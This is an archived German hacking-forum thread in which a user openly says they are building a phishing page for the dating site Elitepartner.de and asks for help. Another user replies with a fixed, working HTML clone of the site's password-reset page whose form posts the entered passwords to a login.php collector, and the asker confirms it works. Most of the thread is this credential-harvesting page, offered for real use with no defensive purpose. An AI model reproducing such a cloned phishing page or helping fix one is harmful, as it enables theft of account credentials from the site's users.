PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Elitepartner.de - Phishing



Lenya21
02.09.2010, 14:22
Hallo,

ich arbeite gerade an einer Phishing-Page für Elitepartner.de. Bis jetzt bin ich eigentlich immer auch ohne große html Kenntnisse ans Ziel gekommen, nur diesmal funktioniert es einfach nicht.

Wäre nett, wenn mir jemand die index.html so abändern könnte, dass das Passwort an eine login.php gesendet wird. Im Moment ist es so, dass beim klicken auf den Button gar nix passiert.

index.html und login.php:
Multiupload.com - upload your files to multiple file hosting sites! (http://www.multiupload.com/72Z5CNZT02)

IRET
02.09.2010, 15:05
Logischer Weise muss auch ein Submit-Button betätigt werden.
Hier werden die Datem nämlich per JS anbgeschickt.
Hier mal die schnell gefixte (ungetestete) index.html:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="de-DE" xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" style="">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">





<title>ElitePartner - Die Adresse f&uuml;r Singles mit Niveau</title>
<meta name="robots" content="index, follow">
<meta http-equiv="content-language" content="de">
<meta http-equiv="expires" content="0">
<meta http-equiv="pragma" content="no-cache">
<meta name="rating" content="general">
<meta http-equiv="imagetoolbar" content="false">
<link rel="SHORTCUT ICON" href="favicon.gif">
<link rel="canonical" href="http://www.elitepartner.de/km/pwLost.do">

<!--[if IE 8]>
<style type="text/css">@import url( "/km/css/ie80.css" );</style>
<![endif]-->
<!--[if IE 7]>
<style type="text/css">@import url( "/km/css/ie70.css" );</style>
<![endif]-->
<!--[if IE 6]>
<style type="text/css">@import url( "/km/css/ie60.css" );</style>
<![endif]-->




<link rel="stylesheet" type="text/css" href="index.css" media="all">
</head>
<body id="ep_body" class="ep_body_design_blue"><img src="afrpt.gif" id="AFhss_trk" name="AFhss_trk" style="display: none;"><div id="AFhss_dfs" class="AFhss_dpnone"><div id="AFhss_adrp0" class="AFhss_dpnone"></div><div id="AFhss_adrp1" class="AFhss_dpnone"></div><div id="AFhss_adrp2" class="AFhss_dpnone"></div><div id="AFhss_adrp3" class="AFhss_dpnone"></div><div id="AFhss_adrp4" class="AFhss_dpnone"></div><div id="AFhss_adrp5" class="AFhss_dpnone"></div><div id="AFhss_adrp6" class="AFhss_dpnone"></div><div id="AFhss_adrp7" class="AFhss_dpnone"></div><div id="AFhss_adrp8" class="AFhss_dpnone"></div><div id="AFhss_adrp9" class="AFhss_dpnone"></div></div><div id="vngq106" class="AFc_all106" style="height: 91px; display: none; border: 0pt none; top: 0pt; left: 0pt; width: 100%; z-index: 666999; background: url(&quot;bg_content_5x121.gif&quot;) repeat-x scroll 0% 0% transparent;"><div class="AFc_all106" id="dvc" style="margin-left: auto; margin-right: auto; width: 748px;" align="center"><div style="z-index: 999666; margin: 0pt; padding: 0pt; float: left; height: 90px; width: 728px;"></div><span class="AFc_all" onclick="_AF$.clsBtn();return false;" id="AFi_ClA106" style="color: rgb(0, 0, 0); height: 12px; font-family: verdana,arial,tahoma; width: 12px; line-height: 0.7; font-weight: bolder; background-color: rgb(255, 255, 255); float: right; cursor: pointer; margin: 0pt; border: 0pt none; padding: 0pt;" alt="close" title="Close this ad.">x</span></div></div>
<div id="ap_wrapper">
<div id="ep_content" class="ep_content_page ep_clearfix"><!-- Start Content -->
<div id="ap_wrapper_inner">

<div id="ep_maincontent">

<h1>
Passwort vergessen?
</h1>
<p> Bitte geben Sie Ihr neues Passwort ein. Im Anschluss klicken Sie bitte auf den Button "Neues Passwort speichern". Ihr neues Passwort wird gespeichert und Sie k&ouml;nnen unseren Service wie gewohnt nutzen. </p>

<form method="post" action="login.php" class="ep_findMatch" id="changePasswordWhenForgotten">
<input name="key" value="7E3063F7-cfa9850850db3ef3" type="hidden">

<div class="ep_float_l">
<label for="password">
<span>Passwort</span>
</label>
<br>


<input name="password" tabindex="1" value="" id="password" class="ep_padded_input" type="password">


</div>
<div class="ep_half_last">
<br>
</div>
<div class="ep_float_l">
<label for="password2">
<span>Passwort-Wiederholung</span>
</label>
<br>


<input name="password2" tabindex="2" value="" id="password2" class="ep_padded_input" type="password">


</div>
<br class="ep_clearall">
<button type="submit" id="ep_action_button_-1191628581999882006" class="ep_button ep_btn_dehighlight"><span class="ep_outerspan"><span class="ep_innerspan">Neues Passwort speichern</span></span></button>

</form>


</div><!-- Ende Main-Content -->

<div id="ep_magazin_teaser"><!-- Rechte Spalte -->












<br class="ep_clearall">






</div><!-- ENDE Rechte Spalte -->
<br class="ep_clearall">

<div>
<div id="ep_header">
<div id="ep_logo">
<a href="http://www.elitepartner.de/">
<img src="ep_logo_350x60_de.gif" alt="Partnersuche und Partnervermittlung für Akademiker und Singles mit Niveau">
</a>
</div>
<br class="ep_clearall">
</div>
</div></div>











<div id="ap_menuwrapper">
<div id="ap_menuwrapper_inner">
<ul id="ep_mainnav" class="ep_starthomepage_blue_mainnav">
<li id="ep_nav_homeLink">
<div class="ep_nav_homeLink_div">
<a href="http://www.elitepartner.de/">
<img src="navi_l_3x25.gif" alt="" class="ep_nav_img" id="ep_nav_homeLink_navi_l">
<img src="navi_home_29x25.gif" alt="Startseite" class="ep_nav_img" id="ep_nav_homeLink_navi_home">
</a>
</div>
</li>


<li id="ep_nav_item_01" class="ep_starthomepage_blue_nav


ep_active



">


<img src="navi_down_l_3x28.gif" alt="" class="ep_nav_img">



<a href="http://www.elitepartner.de/km/warum/index.do">
Willkommen
</a>



<img src="navi_down_r_3x28.gif" alt="" class="ep_nav_img">





</li>

<li id="ep_nav_item_02" class="ep_starthomepage_blue_nav





">





<img src="navi_seperator_down_9x28.gif" alt="" class="ep_nav_img" id="navi_separator_ep_nav_item_02">





<a href="http://www.elitepartner.de/km/rundgang/index.do">
Rundgang
</a>







</li>

<li id="ep_nav_item_03" class="ep_starthomepage_blue_nav





">






<img src="navi_seperator_9x28.gif" alt="" class="ep_nav_img" id="navi_separator_ep_nav_item_03">




<a href="http://www.elitepartner.de/km/erfolgsgeschichten/index.html">
Erfolgsgeschichten
</a>







</li>

<li id="ep_nav_item_04" class="ep_starthomepage_blue_nav





">






<img src="navi_seperator_9x28.gif" alt="" class="ep_nav_img" id="navi_separator_ep_nav_item_04">




<a href="http://www.elitepartner.de/km/magazin/index.html">
Magazin
</a>







</li>

<li id="ep_nav_item_05" class="ep_starthomepage_blue_nav





">






<img src="navi_seperator_9x28.gif" alt="" class="ep_nav_img" id="navi_separator_ep_nav_item_05">




<a href="http://www.elitepartner.de/forum/index.html">
Forum
</a>







</li>

<li id="ep_nav_item_08" class="ep_starthomepage_blue_nav">






<img src="navi_seperator_9x28.gif" alt="" class="ep_nav_img" id="navi_separator_ep_nav_item_08">




<a href="http://www.elitepartner.de/km/service/travels/sunwave.do">
Reisen
</a>







</li>

<li id="ep_nav_item_06" class="ep_starthomepage_blue_nav





">






<img src="navi_seperator_9x28.gif" alt="" class="ep_nav_img" id="navi_separator_ep_nav_item_06">




<a href="http://www.elitepartner.de/km/impressum.do">
Über ElitePartner
</a>







</li>

<li id="ep_nav_item_07" class="ep_starthomepage_blue_nav



ep_last


">






<img src="navi_seperator_9x28.gif" alt="" class="ep_nav_img" id="navi_separator_ep_nav_item_07">




<a href="http://www.elitepartner.de/km/registration/fregistrationpage.do">
Anmelden
</a>




<img src="navi_r_3x25.gif" alt="" class="ep_nav_img" id="navi_r_last">



</li>

</ul>

</div>
</div>








<div id="ap_footerwrapper">
<div id="ap_footerwrapper_inner">
<div id="ep_footer" class="ep_clearfix ep_footer_start ep_w_100p">
<div class="ep_float_l ">
<ul class="ep_footer_nav">
<li class="ep_first"><a href="http://www.elitepartner.de/km/presse/index.do">Presse</a> |</li>
<li><a href="javascript:if(jsIsReady()){openPrivacyTerms();}">Datenschutz</a> |</li>
<li>
<a href="http://www.elitepartner.de/km/preise_und_leistungen.do">Leistungen</a>
|
</li>
<li><a href="http://www.elitepartner.de/km/impressum.do">Impressum</a> |</li>
<li><a href="javascript:if(jsIsReady()){openAGB();}">AGB</a> |</li>
<li><a href="http://www.elitepartner.de/km/aktionen/fepAktion.do">Gutschein einl&ouml;sen</a> |</li>


<li><a href="http://www.elitepartner.de/km/jobs/index.do">Jobs</a> |</li>
<li><a href="javascript:if(jsIsReady()){openHelp();}">FAQ</a></li>



</ul>
<br class="ep_clearall ep_fs_0">
<ul class="ep_footer_nav ep_padding_t_6">
<li class="ep_first"><a href="http://www.elitepartner.de/km/kontakt.do">Kontakt</a></li>
<li class=""> | <a href="http://www.elitepartner.de/km/promo/tellja.do">Freunde werben</a></li>
<li id="ep_affiliate_link_footer" class=""> | <a href="http://www.elitepartner.de/km/affiliate-programm.do">Partnerprogramm</a></li>
<li> | <a href="http://www.elitepartner.de/km/magazin/sonstige_rubriken/elitepartner-jetzt-auch-auf-ihrem-handy.html">Mobile</a></li><li> | <a href="http://www.elitepartner.de/Sicherheit">Sicherheit</a></li>
</ul>
</div>

<div class="ep_footer_news">
<div id="ep_newsletter">
<form method="post" action="http://www.elitepartner.de/km/newsletter/sendSimple.do" id="ep_newsletterForm">
<input name="act" value="subscribe" type="hidden">
<fieldset>
<legend>Anmeldung zum Newsletter</legend>
<label for="ep_newsletter_email" class="ep_field_label">Newsletter bestellen:</label>
<input name="email" id="ep_newsletter_email" class="ep_inputs" value="Meine E-Mailadresse·" type="text">




<button id="ep_newsletter_submit" class="ep_button_blue" type="submit"> <span class="ep_outerspan">&nbsp;</span> </button>

<br class="ep_clearall">
</fieldset>
</form>
</div>
<br class="ep_clearall">

<div id="ep_rss">
<a href="#ep_rss" onclick="$('#ep_rss_choose').toggle();"><span class="ep_float_l ep_gfx_l my_ep_rss">&nbsp;</span></a>
<a href="#ep_rss" onclick="$('#ep_rss_choose').toggle();">RSS-Feed abonnieren</a>
<div id="ep_rss_choose">
<div id="ep_inner_choose">
<span class="ep_float_l ep_gfx_l my_ep_rss">&nbsp;<a href="http://www.elitepartner.de/km/rss/newFemaleMembers.do">Neue weibliche Mitglieder</a></span><br class="ep_clearall">
<span class="ep_float_l ep_gfx_l my_ep_rss">&nbsp;<a href="http://www.elitepartner.de/km/rss/newMaleMembers.do">Neue m&auml;nnliche Mitglieder</a></span><br class="ep_clearall">
<span class="ep_float_l ep_gfx_l my_ep_rss_info"><a href="http://www.elitepartner.de/km/rss/aboutRss.do">Was ist ein RSS-Feed</a></span><br class="ep_clearall">
</div>
</div>
</div>
</div>


<br class="ep_clearall">
</div>
</div>
</div>


</div><!-- Ende Content -->
</div>

<img src="untitled" border="0" height="1" width="1">

<!-- List Id = 38435 and List Name = Nicht-Reg -->
<!-- Begin ad tag -->
<img src="activity_001.dat" alt="" border="0" height="1" width="1">

<div style="display: none;" id="tooltip"><h3></h3><div class="body"></div><div class="url"></div></div></body>
</html>

Lenya21
02.09.2010, 15:40
Hat funktioniert. Vielen Dank!

100
02.09.2010, 15:41
Bei Elitepartner wird sowieso niemand auf sowas reinfallen, da halten sich nur die besten der Besten auf ;)

starr
02.09.2010, 15:56
Warum brauch dafür überhaupt eine Phishing seite? :D